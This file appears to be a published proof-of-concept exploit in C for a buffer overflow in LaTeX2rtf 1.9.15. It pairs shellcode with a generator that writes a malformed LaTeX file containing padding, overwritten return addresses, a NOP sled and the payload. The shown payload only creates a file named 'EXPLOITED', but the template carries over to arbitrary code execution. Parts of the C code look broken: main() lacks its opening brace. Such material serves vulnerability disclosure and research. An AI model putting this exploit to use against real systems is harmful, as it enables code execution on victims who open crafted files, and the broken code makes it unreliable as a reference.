/*
source: https://www.securityfocus.com/bid/11233/info
It is reported that LaTeX2rtf is susceptible to a remote buffer overflow vulnerability when handling malformed files. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable computer to gain unauthorized access. This issue is due to a failure of the application to perform proper bounds checks before copying data into a fixed sized memory buffer.
Version 1.9.15 of LaTeX2rtf is reported vulnerable to this issue. Other versions may also be affected.
*/
char center[] = {
0x59 /* cx = *sp++ */
, 0x31, 0xc0 /* ax ^= ax */
, 0x40 /* ++ax */
, 0x40 /* ++ax */
, 0x40 /* ++ax */
, 0xc1, 0xe0, 0x07 /* ax <<= 7 */
, 0x50 /* *--sp = ax 0600 */
, 0xb8, 0x12, 0x34, 0x56, 0x02 /* ax = 0x02563412 */
, 0xc1, 0xe8, 0x18 /* ax >>= 24 */
, 0xc1, 0xe0, 0x08 /* ax <<= 8 */
, 0x50 /* *--sp = ax 512:O_CREAT */
, 0x51 /* *--sp = cx "EXPLOITED" */
, 0x31, 0xc0 /* ax ^= ax */
, 0xb0, 0x05 /* ax = (ax & ~255) + 5 */
, 0x50 /* *--sp = ax 5:open */
, 0xcd, 0x80 /* syscall */
, 0x31, 0xc0 /* ax ^= ax */
, 0x50 /* *--sp = ax 0 */
, 0x40 /* ++ax */
, 0x50 /* *--sp = ax 1:exit */
, 0xcd, 0x80 /* syscall */
} ;
int main()
int i;
printf("\\def\\row#1{");
for (i = 0;i < 1024;++i)
putchar('x');
for (i = 0;i < 6;++i) {
/* preserve args[0] */
putchar(0x40); putchar(0x6d); putchar(0x08); putchar(0x08);
}
for (i = 0;i < 5;++i) {
/* smasher */
putchar(0x40); putchar(0xf9); putchar(0xbf); putchar(0xbf);
}
for (i = 0;i < 256;++i)
putchar(0x90);
putchar(0xeb); putchar(sizeof(center));
/* 0xeb 0x07 means ip += 7 */
/* assuming here that center has at most 255 bytes */
for (i = 0;i < sizeof center;++i)
putchar(center[i]);
putchar(0xe8);
putchar(251 - sizeof center); putchar(0xff); putchar(0xff); putchar(0xff);
/* 0xe8 0xf4 0xff 0xff 0xff means *--sp = ip; ip -= 12 */
printf("EXPLOITED");
printf("}\n");
printf("\\begin{document}\n");
printf("\\row a\n");
printf("\\end{document}\n");
}
